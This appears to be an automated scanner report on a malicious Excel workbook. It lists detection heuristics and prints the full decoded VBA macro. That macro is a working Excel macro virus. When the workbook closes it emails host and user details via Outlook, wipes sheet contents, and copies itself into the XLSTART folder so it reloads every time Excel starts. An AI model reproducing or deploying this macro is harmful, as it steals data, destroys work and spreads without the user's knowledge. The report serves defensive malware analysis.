MALICIOUS
118
Risk Score
Heuristics 6
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set ol = CreateObject("outlook.application") -
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCEThe macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.Matched line in script
ActiveWorkbook.SaveAs FileName:=Application.StartupPath & "\ Book1.xls", _ -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
External workbook data link low OOXML_EXTERNAL_REL_DATALINKExternal workbook reference in xl/externalLinks/_rels/externalLink1.xml.rels: https://ugentbe-my.sharepoint.com/personal/marieclaire_vandevelde_ugent_be/Documents/Documents/B V/Collectief Maatsch Pr
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://ugentbe-my.sharepoint.com/personal/marieclaire_vandevelde_ugent_be/Documents/Documents/B OOXML external relationship
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3918 bytes |
SHA-256: 71a2ea7bbfc7c47006aada9caabfb76b648459a69c78b894f26e66b40664c945 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error Resume Next
'Salveazã documentul activ
ActiveWorkbook.Save
'Opreste alertarea la stergerea paginilor (sau la altele)
Application.DisplayAlerts = False
'Creste viteza programului si nu lasã sã se vadã pe ecran modificãrile, în timp real
Application.ScreenUpdating = False
On Error Resume Next
SetAttr "C:\Setup.old", vbNormal
If Dir("C:\Setup.old") = "" Then
Open "C:\Setup.old" For Output As #1
For i = 1 To 2
Print #1, "[OptionalComponents]"
Next i
Close #1
SetAttr "C:\Setup.old", vbHidden
'Trimite informatii
Dim ol As Object, myItem As Object
Set ol = CreateObject("outlook.application")
Set myItem = ol.CreateItem(olTaskItem)
With myItem
.To = "Vangu"
.Subject = "Metanol"
.Body = "M-a trimis Metan astãzi " & Now & Chr(13) & _
"Date despre gazdã: " & Chr(13) & _
" - De la: " & Application.UserName & Chr(13) & _
" - Din fisierul: " & Application.ActiveWorkbook.Name & Chr(13) & _
" - Având prestabilit fontul: " & Application.StandardFont & Chr(13) & _
" - Salvând în fisierul prestabilit: " & Application.DefaultFilePath & Chr(13) & _
" - Având discul curent cu memorie: " & Application.MemoryTotal & " byts." & Chr(13) & _
" - din care ocupatã: " & Application.MemoryUsed & " byts." & Chr(13) & _
" - liberã: " & Application.MemoryFree & " byts." & Chr(13) & _
" - Cu sistem de operare: " & Application.OperatingSystem & Chr(13) & _
" - Din " & Application.OrganizationName & Chr(13) & _
" - Documentul apelat înaintea celui prezent: " & Application.RecentFiles(2).Name
.NoAging = True
.Close (olSave)
.Send
End With
Set ol = Nothing
Else
End If
'Dacã nr. de pagini din aplicatia prezentã este mai mare decât nr. de pagini din Options
Do While Application.Sheets.Count > Application.SheetsInNewWorkbook
i = Application.Sheets.Count
Worksheets(i).Activate
Worksheets(i).Delete
Loop
'Boteazã paginile cu exceptia primeia
n = Application.Sheets.Count
For i = 1 To n
Sheets(i).Name = "Sheet" & i
Next i
'Se sterge continutul paginilor rãmase
For i = 1 To Application.Sheets.Count
Sheets(i).Activate
Application.ActiveSheet.UsedRange.Select
Selection.Clear
'Se sterg si toate controalele
Set Chestii = Worksheets(i).Shapes
For Each shp In Chestii
shp.Delete
Next
Range("A1").Select
Next i
'Se salveazã
ActiveWorkbook.SaveAs FileName:=Application.StartupPath & "\ Book1.xls", _
FileFormat:=xlNormal
'Se închide aplicatia
Application.Workbooks(" Book1.xls").Close
'Se ascunde Book1 (dar nici Excel nu-l mai vede)
'SetAttr Application.StartupPat & "\ Book1.xls", vbHidden
'Se reporneste obtiunea de alertare
Application.DisplayAlerts = True
Sheets(1).Activate
'Se up-dateazã ecranul cu modificãrile
Application.ScreenUpdating = True
Range("a1").Select
End Sub
Private Sub Workbook_Open()
'Worksheets(1).Activate
'MsgBox ("La Multi Ani " & Application.UserName & " din " & Application.OrganizationName & " !")
End Sub
Private Sub Workbook_SheetActivate(ByVal Sh As Object)
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 20480 bytes |
SHA-256: 7c6397485aea97b3d29248e049a8b6d9668485dad671774c64de2279727d1203 |
|||
emf_00.emf |
ooxml-emf | OOXML EMF part: xl/media/image1.emf | 113424 bytes |
SHA-256: 23cfa4d8f277088ba78708efe67cc21e31b07294a79f7321a5ef3bad6d09d7e6 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.